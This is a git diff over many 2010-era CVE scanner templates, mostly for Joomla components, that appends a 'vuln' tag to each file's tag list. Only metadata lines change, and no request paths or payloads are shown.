index 1f87208d4eb..ce20df14023 100644 --- a/http/cves/2010/CVE-2010-1472.yaml +++ b/http/cves/2010/CVE-2010-1472.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: kazulah product: com_horoscope - tags: cve,cve2010,joomla,lfi,edb,kazulah + tags: cve,cve2010,joomla,lfi,edb,kazulah,vuln http: - method: GET diff --git a/http/cves/2010/CVE-2010-1473.yaml b/http/cves/2010/CVE-2010-1473.yaml index 4cdede6976d..e0ab84c72fc 100644 --- a/http/cves/2010/CVE-2010-1473.yaml +++ b/http/cves/2010/CVE-2010-1473.yaml @@ -25,7 +25,7 @@ info: max-request: 1 vendor: johnmccollum product: com_advertising - tags: cve2010,cve,joomla,lfi,edb,packetstorm,johnmccollum + tags: cve2010,cve,joomla,lfi,edb,packetstorm,johnmccollum,vuln http: - method: GET diff --git a/http/cves/2010/CVE-2010-1474.yaml b/http/cves/2010/CVE-2010-1474.yaml index c81df086fd7..f14312edec1 100644 --- a/http/cves/2010/CVE-2010-1474.yaml +++ b/http/cves/2010/CVE-2010-1474.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: supachai_teasakul product: com_sweetykeeper - tags: cve2010,cve,joomla,lfi,edb,supachai_teasakul + tags: cve2010,cve,joomla,lfi,edb,supachai_teasakul,vuln http: - method: GET diff --git a/http/cves/2010/CVE-2010-1475.yaml b/http/cves/2010/CVE-2010-1475.yaml index 760986e35a0..31c5105aaca 100644 --- a/http/cves/2010/CVE-2010-1475.yaml +++ b/http/cves/2010/CVE-2010-1475.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: ternaria product: com_preventive - tags: cve,cve2010,edb,joomla,lfi,ternaria + tags: cve,cve2010,edb,joomla,lfi,ternaria,vuln http: - method: GET diff --git a/http/cves/2010/CVE-2010-1476.yaml b/http/cves/2010/CVE-2010-1476.yaml index 87850c4f655..4fa1db70b0b 100644 --- a/http/cves/2010/CVE-2010-1476.yaml +++ b/http/cves/2010/CVE-2010-1476.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: alphaplug product: com_alphauserpoints - tags: cve,cve2010,joomla,lfi,edb,packetstorm,alphaplug + tags: cve,cve2010,joomla,lfi,edb,packetstorm,alphaplug,vuln http: - method: GET diff --git a/http/cves/2010/CVE-2010-1478.yaml b/http/cves/2010/CVE-2010-1478.yaml index 530a0a8ea1f..7399f65ffdd 100644 --- a/http/cves/2010/CVE-2010-1478.yaml +++ b/http/cves/2010/CVE-2010-1478.yaml @@ -24,7 +24,7 @@ info: max-request: 1 vendor: ternaria product: com_jfeedback - tags: cve,cve2010,joomla,lfi,edb,ternaria + tags: cve,cve2010,joomla,lfi,edb,ternaria,vuln http: - method: GET diff --git a/http/cves/2010/CVE-2010-1491.yaml b/http/cves/2010/CVE-2010-1491.yaml index 2a1377d2269..2a696903633 100644 --- a/http/cves/2010/CVE-2010-1491.yaml +++ b/http/cves/2010/CVE-2010-1491.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: mms.pipp product: com_mmsblog - tags: cve,cve2010,joomla,lfi,edb,packetstorm,mms.pipp + tags: cve,cve2010,joomla,lfi,edb,packetstorm,mms.pipp,vuln http: - method: GET diff --git a/http/cves/2010/CVE-2010-1494.yaml b/http/cves/2010/CVE-2010-1494.yaml index 65b69d4c8db..d54f3a8d7d4 100644 --- a/http/cves/2010/CVE-2010-1494.yaml +++ b/http/cves/2010/CVE-2010-1494.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: awdsolution product: com_awdwall - tags: cve,cve2010,joomla,lfi,edb,awdsolution + tags: cve,cve2010,joomla,lfi,edb,awdsolution,vuln http: - method: GET diff --git a/http/cves/2010/CVE-2010-1495.yaml b/http/cves/2010/CVE-2010-1495.yaml index 25e42c34224..9c4ab8b635d 100644 --- a/http/cves/2010/CVE-2010-1495.yaml +++ b/http/cves/2010/CVE-2010-1495.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: matamko product: com_matamko - tags: cve2010,cve,joomla,lfi,edb,packetstorm,matamko + tags: cve2010,cve,joomla,lfi,edb,packetstorm,matamko,vuln http: - method: GET diff --git a/http/cves/2010/CVE-2010-1531.yaml b/http/cves/2010/CVE-2010-1531.yaml index af54176d457..0b90451fbff 100644 --- a/http/cves/2010/CVE-2010-1531.yaml +++ b/http/cves/2010/CVE-2010-1531.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: redcomponent product: com_redshop - tags: cve2010,cve,lfi,edb,packetstorm,joomla,redcomponent + tags: cve2010,cve,lfi,edb,packetstorm,joomla,redcomponent,vuln http: - method: GET diff --git a/http/cves/2010/CVE-2010-1532.yaml b/http/cves/2010/CVE-2010-1532.yaml index 95e830b325c..23c04c86b37 100644 --- a/http/cves/2010/CVE-2010-1532.yaml +++ b/http/cves/2010/CVE-2010-1532.yaml @@ -25,7 +25,7 @@ info: max-request: 1 vendor: givesight product: com_powermail - tags: cve,cve2010,joomla,lfi,edb,packetstorm,givesight + tags: cve,cve2010,joomla,lfi,edb,packetstorm,givesight,vuln http: - method: GET diff --git a/http/cves/2010/CVE-2010-1533.yaml b/http/cves/2010/CVE-2010-1533.yaml index 344befce9ea..2d559d91cc7 100644 --- a/http/cves/2010/CVE-2010-1533.yaml +++ b/http/cves/2010/CVE-2010-1533.yaml @@ -25,7 +25,7 @@ info: max-request: 1 vendor: peter_hocherl product: com_tweetla - tags: cve2010,cve,joomla,lfi,edb,peter_hocherl + tags: cve2010,cve,joomla,lfi,edb,peter_hocherl,vuln http: - method: GET diff --git a/http/cves/2010/CVE-2010-1534.yaml b/http/cves/2010/CVE-2010-1534.yaml index ba1fa019079..eb5e7d9af61 100644 --- a/http/cves/2010/CVE-2010-1534.yaml +++ b/http/cves/2010/CVE-2010-1534.yaml @@ -24,7 +24,7 @@ info: max-request: 1 vendor: joomla.batjo product: com_shoutbox - tags: cve2010,cve,joomla,lfi,edb,joomla.batjo + tags: cve2010,cve,joomla,lfi,edb,joomla.batjo,vuln http: - method: GET diff --git a/http/cves/2010/CVE-2010-1535.yaml b/http/cves/2010/CVE-2010-1535.yaml index 2cfc876759a..58ff98037aa 100644 --- a/http/cves/2010/CVE-2010-1535.yaml +++ b/http/cves/2010/CVE-2010-1535.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: peter_hocherl product: com_travelbook - tags: cve,cve2010,joomla,lfi,edb,peter_hocherl + tags: cve,cve2010,joomla,lfi,edb,peter_hocherl,vuln http: - method: GET diff --git a/http/cves/2010/CVE-2010-1540.yaml b/http/cves/2010/CVE-2010-1540.yaml index b2c5811f567..affef33faf0 100644 --- a/http/cves/2010/CVE-2010-1540.yaml +++ b/http/cves/2010/CVE-2010-1540.yaml @@ -24,7 +24,7 @@ info: max-request: 1 vendor: myblog product: com_myblog - tags: cve2010,cve,joomla,lfi,edb,myblog + tags: cve2010,cve,joomla,lfi,edb,myblog,vuln http: - method: GET diff --git a/http/cves/2010/CVE-2010-1586.yaml b/http/cves/2010/CVE-2010-1586.yaml index e78d54842ba..15b76013661 100644 --- a/http/cves/2010/CVE-2010-1586.yaml +++ b/http/cves/2010/CVE-2010-1586.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: hp product: system_management_homepage - tags: cve,cve2010,redirect,smh,hp + tags: cve,cve2010,redirect,smh,hp,vuln http: - method: GET diff --git a/http/cves/2010/CVE-2010-1601.yaml b/http/cves/2010/CVE-2010-1601.yaml index c81e4bb0d90..8dd2001f491 100644 --- a/http/cves/2010/CVE-2010-1601.yaml +++ b/http/cves/2010/CVE-2010-1601.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: joomlamart product: com_jacomment - tags: cve,cve2010,joomla,lfi,edb,packetstorm,joomlamart + tags: cve,cve2010,joomla,lfi,edb,packetstorm,joomlamart,vuln http: - method: GET diff --git a/http/cves/2010/CVE-2010-1602.yaml b/http/cves/2010/CVE-2010-1602.yaml index 0d7ab559645..a8d1675655c 100644 --- a/http/cves/2010/CVE-2010-1602.yaml +++ b/http/cves/2010/CVE-2010-1602.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: zimbllc product: com_zimbcomment - tags: cve,cve2010,lfi,edb,packetstorm,joomla,zimbllc + tags: cve,cve2010,lfi,edb,packetstorm,joomla,zimbllc,vuln http: - method: GET diff --git a/http/cves/2010/CVE-2010-1603.yaml b/http/cves/2010/CVE-2010-1603.yaml index dff9dd3fc3d..7e6af91661f 100644 --- a/http/cves/2010/CVE-2010-1603.yaml +++ b/http/cves/2010/CVE-2010-1603.yaml @@ -25,7 +25,7 @@ info: max-request: 1 vendor: zimbllc product: com_zimbcore - tags: cve,cve2010,joomla,lfi,edb,zimbllc + tags: cve,cve2010,joomla,lfi,edb,zimbllc,vuln http: - method: GET diff --git a/http/cves/2010/CVE-2010-1607.yaml b/http/cves/2010/CVE-2010-1607.yaml index 62b7f8f9b6b..858c7b3deee 100644 --- a/http/cves/2010/CVE-2010-1607.yaml +++ b/http/cves/2010/CVE-2010-1607.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: paysyspro product: com_wmi - tags: cve,cve2010,joomla,lfi,edb,paysyspro + tags: cve,cve2010,joomla,lfi,edb,paysyspro,vuln http: - method: GET diff --git a/http/cves/2010/CVE-2010-1653.yaml b/http/cves/2010/CVE-2010-1653.yaml index adcc4164c09..2e137b1812b 100644 --- a/http/cves/2010/CVE-2010-1653.yaml +++ b/http/cves/2010/CVE-2010-1653.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: htmlcoderhelper product: com_graphics - tags: cve,cve2010,edb,packetstorm,joomla,lfi,htmlcoderhelper + tags: cve,cve2010,edb,packetstorm,joomla,lfi,htmlcoderhelper,vuln http: - method: GET diff --git a/http/cves/2010/CVE-2010-1657.yaml b/http/cves/2010/CVE-2010-1657.yaml index 476070932f2..f5873febb26 100644 --- a/http/cves/2010/CVE-2010-1657.yaml +++ b/http/cves/2010/CVE-2010-1657.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: recly product: com_smartsite - tags: cve,cve2010,joomla,lfi,edb,recly + tags: cve,cve2010,joomla,lfi,edb,recly,vuln http: - method: GET diff --git a/http/cves/2010/CVE-2010-1658.yaml b/http/cves/2010/CVE-2010-1658.yaml index f93da7f6601..1cfbcc46443 100644 --- a/http/cves/2010/CVE-2010-1658.yaml +++ b/http/cves/2010/CVE-2010-1658.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: code-garage product: com_noticeboard - tags: cve,cve2010,joomla,lfi,edb,code-garage + tags: cve,cve2010,joomla,lfi,edb,code-garage,vuln http: - method: GET diff --git a/http/cves/2010/CVE-2010-1659.yaml b/http/cves/2010/CVE-2010-1659.yaml index b82a412d3c9..16596b474d9 100644 --- a/http/cves/2010/CVE-2010-1659.yaml +++ b/http/cves/2010/CVE-2010-1659.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: webkul product: com_ultimateportfolio - tags: cve2010,cve,joomla,lfi,edb,webkul + tags: cve2010,cve,joomla,lfi,edb,webkul,vuln http: - method: GET diff --git a/http/cves/2010/CVE-2010-1714.yaml b/http/cves/2010/CVE-2010-1714.yaml index a811f5060de..9361365407c 100644 --- a/http/cves/2010/CVE-2010-1714.yaml +++ b/http/cves/2010/CVE-2010-1714.yaml @@ -25,7 +25,7 @@ info: max-request: 1 vendor: dev.pucit.edu.pk product: com_arcadegames - tags: cve2010,cve,joomla,lfi,edb,packetstorm,dev.pucit.edu.pk + tags: cve2010,cve,joomla,lfi,edb,packetstorm,dev.pucit.edu.pk,vuln http: - method: GET diff --git a/http/cves/2010/CVE-2010-1715.yaml b/http/cves/2010/CVE-2010-1715.yaml index a2df7d932ac..4179c4a0b2a 100644 --- a/http/cves/2010/CVE-2010-1715.yaml +++ b/http/cves/2010/CVE-2010-1715.yaml @@ -25,7 +25,7 @@ info: max-request: 1 vendor: pucit.edu product: com_onlineexam - tags: cve,cve2010,joomla,lfi,edb,packetstorm,pucit.edu + tags: cve,cve2010,joomla,lfi,edb,packetstorm,pucit.edu,vuln http: - method: GET diff --git a/http/cves/2010/CVE-2010-1717.yaml b/http/cves/2010/CVE-2010-1717.yaml index feb0f76f4be..368108d9400 100644 --- a/http/cves/2010/CVE-2010-1717.yaml +++ b/http/cves/2010/CVE-2010-1717.yaml @@ -28,7 +28,7 @@ info: vendor: if_surfalert_project product: if_surfalert framework: joomla\! - tags: cve,cve2010,joomla,lfi,edb,if_surfalert_project,joomla\! + tags: cve,cve2010,joomla,lfi,edb,if_surfalert_project,joomla\!,vuln http: - method: GET diff --git a/http/cves/2010/CVE-2010-1718.yaml b/http/cves/2010/CVE-2010-1718.yaml index 698619c5fc9..25b23ab7b0c 100644 --- a/http/cves/2010/CVE-2010-1718.yaml +++ b/http/cves/2010/CVE-2010-1718.yaml @@ -23,7 +23,7 @@ info: max-request: 1 vendor: lispeltuut product: com_archeryscores - tags: cve,cve2010,joomla,lfi,edb,lispeltuut + tags: cve,cve2010,joomla,lfi,edb,lispeltuut,vuln http: - method: GET diff --git a/http/cves/2010/CVE-2010-1719.yaml b/http/cves/2010/CVE-2010-1719.yaml index 5b0bb98c1a9..40a9e3fba1f 100644 --- a/http/cves/2010/CVE-2010-1719.yaml +++ b/http/cves/2010/CVE-2010-1719.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: moto-treks product: com_mtfireeagle - tags: cve2010,cve,lfi,edb,joomla,moto-treks + tags: cve2010,cve,lfi,edb,joomla,moto-treks,vuln http: - method: GET diff --git a/http/cves/2010/CVE-2010-1722.yaml b/http/cves/2010/CVE-2010-1722.yaml index 2dc569ef56d..4f2861adaf1 100644 --- a/http/cves/2010/CVE-2010-1722.yaml +++ b/http/cves/2010/CVE-2010-1722.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: dev.pucit.edu.pk product: com_market - tags: cve,cve2010,joomla,lfi,edb,dev.pucit.edu.pk + tags: cve,cve2010,joomla,lfi,edb,dev.pucit.edu.pk,vuln http: - method: GET diff --git a/http/cves/2010/CVE-2010-1723.yaml b/http/cves/2010/CVE-2010-1723.yaml index 38ab3535361..e056738ab9b 100644 --- a/http/cves/2010/CVE-2010-1723.yaml +++ b/http/cves/2010/CVE-2010-1723.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: joomlacomponent.inetlanka product: com_drawroot - tags: cve,cve2010,joomla,lfi,edb,joomlacomponent.inetlanka + tags: cve,cve2010,joomla,lfi,edb,joomlacomponent.inetlanka,vuln http: - method: GET diff --git a/http/cves/2010/CVE-2010-1858.yaml b/http/cves/2010/CVE-2010-1858.yaml index a3a82be760d..ef9fbd7ee03 100644 --- a/http/cves/2010/CVE-2010-1858.yaml +++ b/http/cves/2010/CVE-2010-1858.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: gelembjuk product: com_smestorage - tags: cve2010,cve,joomla,lfi,edb,packetstorm,gelembjuk + tags: cve2010,cve,joomla,lfi,edb,packetstorm,gelembjuk,vuln http: - method: GET diff --git a/http/cves/2010/CVE-2010-1870.yaml b/http/cves/2010/CVE-2010-1870.yaml index 9ffd187f000..78c16c250bc 100644 --- a/http/cves/2010/CVE-2010-1870.yaml +++ b/http/cves/2010/CVE-2010-1870.yaml @@ -36,7 +36,7 @@ info: - title="struts2 showcase" - body="apache struts" google-query: intitle:"struts2 showcase" - tags: cve,cve2010,packetstorm,edb,rce,listserv,ognl,apache + tags: cve,cve2010,packetstorm,edb,rce,listserv,ognl,apache,vuln http: - method: GET diff --git a/http/cves/2010/CVE-2010-1875.yaml b/http/cves/2010/CVE-2010-1875.yaml index c3b1cf69773..13c3359bbce 100644 --- a/http/cves/2010/CVE-2010-1875.yaml +++ b/http/cves/2010/CVE-2010-1875.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: com-property product: com_properties - tags: cve2010,cve,joomla,lfi,edb,com-property + tags: cve2010,cve,joomla,lfi,edb,com-property,vuln http: - method: GET diff --git a/http/cves/2010/CVE-2010-1878.yaml b/http/cves/2010/CVE-2010-1878.yaml index 89a3ee36626..ed699133cb0 100644 --- a/http/cves/2010/CVE-2010-1878.yaml +++ b/http/cves/2010/CVE-2010-1878.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: blueflyingfish.no-ip product: com_orgchart - tags: cve,cve2010,lfi,edb,packetstorm,joomla,blueflyingfish.no-ip + tags: cve,cve2010,lfi,edb,packetstorm,joomla,blueflyingfish.no-ip,vuln http: - method: GET diff --git a/http/cves/2010/CVE-2010-1952.yaml b/http/cves/2010/CVE-2010-1952.yaml index 6a62b4988b7..a3a3f5310b9 100644 --- a/http/cves/2010/CVE-2010-1952.yaml +++ b/http/cves/2010/CVE-2010-1952.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: cmstactics product: com_beeheard - tags: cve,cve2010,joomla,lfi,edb,cmstactics + tags: cve,cve2010,joomla,lfi,edb,cmstactics,vuln http: - method: GET diff --git a/http/cves/2010/CVE-2010-1953.yaml b/http/cves/2010/CVE-2010-1953.yaml index 46dc84d9214..156716957e4 100644 --- a/http/cves/2010/CVE-2010-1953.yaml +++ b/http/cves/2010/CVE-2010-1953.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: joomlacomponent.inetlanka product: com_multimap - tags: cve,cve2010,joomla,lfi,edb,joomlacomponent.inetlanka + tags: cve,cve2010,joomla,lfi,edb,joomlacomponent.inetlanka,vuln http: - method: GET diff --git a/http/cves/2010/CVE-2010-1954.yaml b/http/cves/2010/CVE-2010-1954.yaml index 4f8f79d200c..fafbb816697 100644 --- a/http/cves/2010/CVE-2010-1954.yaml +++ b/http/cves/2010/CVE-2010-1954.yaml @@ -23,7 +23,7 @@ info: max-request: 1 vendor: joomlacomponent.inetlanka product: com_multiroot - tags: cve,cve2010,edb,joomla,lfi,joomlacomponent.inetlanka + tags: cve,cve2010,edb,joomla,lfi,joomlacomponent.inetlanka,vuln http: - method: GET diff --git a/http/cves/2010/CVE-2010-1955.yaml b/http/cves/2010/CVE-2010-1955.yaml index b22487afeb5..b5505378b78 100644 --- a/http/cves/2010/CVE-2010-1955.yaml +++ b/http/cves/2010/CVE-2010-1955.yaml @@ -25,7 +25,7 @@ info: max-request: 1 vendor: thefactory product: com_blogfactory - tags: cve,cve2010,lfi,edb,joomla,thefactory + tags: cve,cve2010,lfi,edb,joomla,thefactory,vuln http: - method: GET diff --git a/http/cves/2010/CVE-2010-1956.yaml b/http/cves/2010/CVE-2010-1956.yaml index b37e3dab35f..73d4ac11ba2 100644 --- a/http/cves/2010/CVE-2010-1956.yaml +++ b/http/cves/2010/CVE-2010-1956.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: thefactory product: com_gadgetfactory - tags: cve,cve2010,joomla,lfi,edb,thefactory + tags: cve,cve2010,joomla,lfi,edb,thefactory,vuln http: - method: GET diff --git a/http/cves/2010/CVE-2010-1957.yaml b/http/cves/2010/CVE-2010-1957.yaml index 03744303338..6b20a32758d 100644 --- a/http/cves/2010/CVE-2010-1957.yaml +++ b/http/cves/2010/CVE-2010-1957.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: thefactory product: com_lovefactory - tags: cve,cve2010,lfi,edb,packetstorm,joomla,thefactory + tags: cve,cve2010,lfi,edb,packetstorm,joomla,thefactory,vuln http: - method: GET diff --git a/http/cves/2010/CVE-2010-1977.yaml b/http/cves/2010/CVE-2010-1977.yaml index 27e0404d3f2..f4d4f1c4757 100644 --- a/http/cves/2010/CVE-2010-1977.yaml +++ b/http/cves/2010/CVE-2010-1977.yaml @@ -24,7 +24,7 @@ info: max-request: 1 vendor: gohigheris product: com_jwhmcs - tags: cve2010,cve,edb,joomla,lfi,gohigheris + tags: cve2010,cve,edb,joomla,lfi,gohigheris,vuln http: - method: GET diff --git a/http/cves/2010/CVE-2010-1979.yaml b/http/cves/2010/CVE-2010-1979.yaml index 63638c0423c..932cf7f4233 100644 --- a/http/cves/2010/CVE-2010-1979.yaml +++ b/http/cves/2010/CVE-2010-1979.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: affiliatefeeds product: com_datafeeds - tags: cve,cve2010,edb,joomla,lfi,affiliatefeeds + tags: cve,cve2010,edb,joomla,lfi,affiliatefeeds,vuln http: - method: GET diff --git a/http/cves/2010/CVE-2010-1980.yaml b/http/cves/2010/CVE-2010-1980.yaml index 8867d756584..2c1f67007b4 100644 --- a/http/cves/2010/CVE-2010-1980.yaml +++ b/http/cves/2010/CVE-2010-1980.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: roberto_aloi product: com_joomlaflickr - tags: cve2010,cve,lfi,edb,packetstorm,joomla,roberto_aloi + tags: cve2010,cve,lfi,edb,packetstorm,joomla,roberto_aloi,vuln http: - method: GET diff --git a/http/cves/2010/CVE-2010-1981.yaml b/http/cves/2010/CVE-2010-1981.yaml index 314c032663d..906f11e62d6 100644 --- a/http/cves/2010/CVE-2010-1981.yaml +++ b/http/cves/2010/CVE-2010-1981.yaml @@ -27,7 +27,7 @@ info: vendor: fabrikar product: fabrik framework: joomla\! - tags: cve,cve2010,joomla,lfi,edb,packetstorm,fabrikar,joomla\! + tags: cve,cve2010,joomla,lfi,edb,packetstorm,fabrikar,joomla\!,vuln http: - method: GET diff --git a/http/cves/2010/CVE-2010-1982.yaml b/http/cves/2010/CVE-2010-1982.yaml index 19c607ed325..bbae59a9121 100644 --- a/http/cves/2010/CVE-2010-1982.yaml +++ b/http/cves/2010/CVE-2010-1982.yaml @@ -24,7 +24,7 @@ info: max-request: 1 vendor: joomlart product: com_javoice - tags: cve,cve2010,joomla,lfi,edb,joomlart + tags: cve,cve2010,joomla,lfi,edb,joomlart,vuln http: - method: GET diff --git a/http/cves/2010/CVE-2010-1983.yaml b/http/cves/2010/CVE-2010-1983.yaml index 7117717ace2..61d24f8231f 100644 --- a/http/cves/2010/CVE-2010-1983.yaml +++ b/http/cves/2010/CVE-2010-1983.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: redcomponent product: com_redtwitter - tags: cve,cve2010,joomla,lfi,edb,packetstorm,redcomponent + tags: cve,cve2010,joomla,lfi,edb,packetstorm,redcomponent,vuln http: - method: GET diff --git a/http/cves/2010/CVE-2010-2018.yaml b/http/cves/2010/CVE-2010-2018.yaml index 4c0df48ea17..35b10e6971b 100644 --- a/http/cves/2010/CVE-2010-2018.yaml +++ b/http/cves/2010/CVE-2010-2018.yaml @@ -20,7 +20,7 @@ info: verified: true max-request: 1 google-query: inurl:/semua-download.html - tags: cve,cve2010,lfi,lokomedia,cms + tags: cve,cve2010,lfi,lokomedia,cms,vuln http: - method: GET diff --git a/http/cves/2010/CVE-2010-2033.yaml b/http/cves/2010/CVE-2010-2033.yaml index db217b32568..0d2ac57aa44 100644 --- a/http/cves/2010/CVE-2010-2033.yaml +++ b/http/cves/2010/CVE-2010-2033.yaml @@ -24,7 +24,7 @@ info: max-request: 1 vendor: percha product: com_perchacategoriestree - tags: cve,cve2010,packetstorm,joomla,lfi,percha + tags: cve,cve2010,packetstorm,joomla,lfi,percha,vuln http: - method: GET diff --git a/http/cves/2010/CVE-2010-2034.yaml b/http/cves/2010/CVE-2010-2034.yaml index 6d98ae628aa..c81d3d09b99 100644 --- a/http/cves/2010/CVE-2010-2034.yaml +++ b/http/cves/2010/CVE-2010-2034.yaml @@ -25,7 +25,7 @@ info: max-request: 1 vendor: percha product: com_perchaimageattach - tags: cve2010,cve,edb,packetstorm,joomla,lfi,percha + tags: cve2010,cve,edb,packetstorm,joomla,lfi,percha,vuln http: - method: GET diff --git a/http/cves/2010/CVE-2010-2035.yaml b/http/cves/2010/CVE-2010-2035.yaml index 0f14b69759a..480397dbf4c 100644 --- a/http/cves/2010/CVE-2010-2035.yaml +++ b/http/cves/2010/CVE-2010-2035.yaml @@ -25,7 +25,7 @@ info: max-request: 1 vendor: percha product: com_perchagallery - tags: cve,cve2010,packetstorm,joomla,lfi,edb,percha + tags: cve,cve2010,packetstorm,joomla,lfi,edb,percha,vuln http: - method: GET diff --git a/http/cves/2010/CVE-2010-2036.yaml b/http/cves/2010/CVE-2010-2036.yaml index 41309cf1b93..ad5ab2ea55f 100644 --- a/http/cves/2010/CVE-2010-2036.yaml +++ b/http/cves/2010/CVE-2010-2036.yaml @@ -25,7 +25,7 @@ info: max-request: 1 vendor: percha product: com_perchafieldsattach - tags: cve,cve2010,lfi,joomla,edb,packetstorm,percha + tags: cve,cve2010,lfi,joomla,edb,packetstorm,percha,vuln http: - method: GET diff --git a/http/cves/2010/CVE-2010-2037.yaml b/http/cves/2010/CVE-2010-2037.yaml index 27a0676a1f4..66a878b1054 100644 --- a/http/cves/2010/CVE-2010-2037.yaml +++ b/http/cves/2010/CVE-2010-2037.yaml @@ -25,7 +25,7 @@ info: max-request: 1 vendor: percha product: com_perchadownloadsattach - tags: cve2010,cve,joomla,edb,packetstorm,lfi,percha + tags: cve2010,cve,joomla,edb,packetstorm,lfi,percha,vuln http: - method: GET diff --git a/http/cves/2010/CVE-2010-2045.yaml b/http/cves/2010/CVE-2010-2045.yaml index 81365d6e61d..88c98ce8cb4 100644 --- a/http/cves/2010/CVE-2010-2045.yaml +++ b/http/cves/2010/CVE-2010-2045.yaml @@ -25,7 +25,7 @@ info: max-request: 1 vendor: dionesoft product: com_dioneformwizard - tags: cve,cve2010,joomla,lfi,edb,packetstorm,dionesoft + tags: cve,cve2010,joomla,lfi,edb,packetstorm,dionesoft,vuln http: - method: GET diff --git a/http/cves/2010/CVE-2010-2050.yaml b/http/cves/2010/CVE-2010-2050.yaml index 917a001d524..af4c1d3cf50 100644 --- a/http/cves/2010/CVE-2010-2050.yaml +++ b/http/cves/2010/CVE-2010-2050.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: m0r0n product: com_mscomment - tags: cve,cve2010,joomla,lfi,edb,packetstorm,m0r0n + tags: cve,cve2010,joomla,lfi,edb,packetstorm,m0r0n,vuln http: - method: GET diff --git a/http/cves/2010/CVE-2010-2122.yaml b/http/cves/2010/CVE-2010-2122.yaml index e4b77906d86..4e564674cb5 100644 --- a/http/cves/2010/CVE-2010-2122.yaml +++ b/http/cves/2010/CVE-2010-2122.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: joelrowley product: com_simpledownload - tags: cve2010,cve,joomla,lfi,edb,joelrowley + tags: cve2010,cve,joomla,lfi,edb,joelrowley,vuln http: - method: GET diff --git a/http/cves/2010/CVE-2010-2128.yaml b/http/cves/2010/CVE-2010-2128.yaml index 8d87f19a037..1f62208eeca 100644 --- a/http/cves/2010/CVE-2010-2128.yaml +++ b/http/cves/2010/CVE-2010-2128.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: harmistechnology product: com_jequoteform - tags: cve,cve2010,joomla,lfi,edb,harmistechnology + tags: cve,cve2010,joomla,lfi,edb,harmistechnology,vuln http: - method: GET diff --git a/http/cves/2010/CVE-2010-2259.yaml b/http/cves/2010/CVE-2010-2259.yaml index cbd9d57076c..5d048a1add0 100644 --- a/http/cves/2010/CVE-2010-2259.yaml +++ b/http/cves/2010/CVE-2010-2259.yaml @@ -25,7 +25,7 @@ info: max-request: 1 vendor: tamlyncreative product: com_bfsurvey_profree - tags: cve,cve2010,joomla,lfi,edb,tamlyncreative + tags: cve,cve2010,joomla,lfi,edb,tamlyncreative,vuln http: - method: GET diff --git a/http/cves/2010/CVE-2010-2307.yaml b/http/cves/2010/CVE-2010-2307.yaml index 63bfb8f0ecb..fdcba511eaf 100644 --- a/http/cves/2010/CVE-2010-2307.yaml +++ b/http/cves/2010/CVE-2010-2307.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: motorola product: surfboard_sbv6120e - tags: cve2010,cve,iot,lfi,motorola,edb + tags: cve2010,cve,iot,lfi,motorola,edb,vuln http: - method: GET diff --git a/http/cves/2010/CVE-2010-2507.yaml b/http/cves/2010/CVE-2010-2507.yaml index 8755fc3eed3..0f9906a3418 100644 --- a/http/cves/2010/CVE-2010-2507.yaml +++ b/http/cves/2010/CVE-2010-2507.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: masselink product: com_picasa2gallery - tags: cve2010,cve,edb,packetstorm,joomla,lfi,masselink + tags: cve2010,cve,edb,packetstorm,joomla,lfi,masselink,vuln http: - method: GET diff --git a/http/cves/2010/CVE-2010-2680.yaml b/http/cves/2010/CVE-2010-2680.yaml index ecc1b1a25cd..3fb9bf70679 100644 --- a/http/cves/2010/CVE-2010-2680.yaml +++ b/http/cves/2010/CVE-2010-2680.yaml @@ -24,7 +24,7 @@ info: max-request: 1 vendor: harmistechnology product: com_jesectionfinder - tags: cve2010,cve,joomla,lfi,edb,packetstorm,harmistechnology + tags: cve2010,cve,joomla,lfi,edb,packetstorm,harmistechnology,vuln http: - method: GET diff --git a/http/cves/2010/CVE-2010-2682.yaml b/http/cves/2010/CVE-2010-2682.yaml index 816f4883c69..f41b5dd0f14 100644 --- a/http/cves/2010/CVE-2010-2682.yaml +++ b/http/cves/2010/CVE-2010-2682.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: realtyna product: com_realtyna - tags: cve,cve2010,joomla,lfi,edb,packetstorm,realtyna + tags: cve,cve2010,joomla,lfi,edb,packetstorm,realtyna,vuln http: - method: GET diff --git a/http/cves/2010/CVE-2010-2857.yaml b/http/cves/2010/CVE-2010-2857.yaml index 22ea2467897..275099aa7b9 100644 --- a/http/cves/2010/CVE-2010-2857.yaml +++ b/http/cves/2010/CVE-2010-2857.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: danieljamesscott product: com_music - tags: cve,cve2010,joomla,lfi,edb,danieljamesscott + tags: 